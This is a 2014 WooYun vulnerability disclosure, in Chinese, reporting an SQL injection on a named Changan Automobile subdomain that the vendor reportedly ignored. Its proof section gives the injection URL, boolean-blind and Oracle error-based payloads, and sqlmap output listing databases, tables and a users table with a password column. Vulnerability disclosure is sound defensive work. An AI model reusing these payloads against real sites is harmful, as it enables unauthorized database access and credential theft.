漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-077100
漏洞标题:重庆长安汽车股份官方旗下分站SQL注射
相关厂商:cncert国家互联网应急中心
漏洞作者: 卡梅隆@广坤
提交时间:2014-09-23 19:18
修复时间:2014-11-07 19:20
公开时间:2014-11-07 19:20
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-07: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
重庆长安汽车股份官方旗下分站SQL注射
详细说明:
重庆长安汽车股份官方旗下分站SQL注射
漏洞证明:
注入点:http://wx.changan.com.cn/miccar_f202/index2.jsp?itemid=7
Place: GET
Parameter: itemid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: itemid=7 AND 1528=1528
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: itemid=7 AND 7147=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(107)|
|CHR(115)||CHR(118)||CHR(58)||(SELECT (CASE WHEN (7147=7147) THEN 1 ELSE 0 END)
FROM DUAL)||CHR(58)||CHR(109)||CHR(97)||CHR(115)||CHR(58)||CHR(62))) FROM DUAL)
web application technology: JSP
back-end DBMS: Oracle
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] MINICAR
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WJCACAR
current schema (equivalent to database on Oracle): 'MINICAR'
current user: 'MINICAR'
Database: MINICAR
[19 tables]
+-------------------+
| T_CAR |
| T_CARATT |
| T_CARATTTYPE |
| T_CARIMG |
| T_CONTENT |
| T_DEALER |
| T_GIFT |
| T_ITEM |
| T_MEMBER |
| T_MEMBERCAR |
| T_MEMBER_ARTICLE |
| T_MEMBER_GIFT |
| T_MEMBER_RECOMAND |
| T_MSG |
| T_RESERVE |
| T_RESERVE20101206 |
| T_USERS |
| T_VISITED_DETAIL |
| T_VISITED_NUM |
+-------------------+
Database: MINICAR
Table: T_USERS
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| DEALER | VARCHAR2 |
| FUN | VARCHAR2 |
| PASSW | VARCHAR2 |
| USERID | VARCHAR2 |
| USERNAME | VARCHAR2 |
+----------+----------+
其他你懂的
修复方案:
过滤!
版权声明:转载请注明来源 卡梅隆@广坤@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝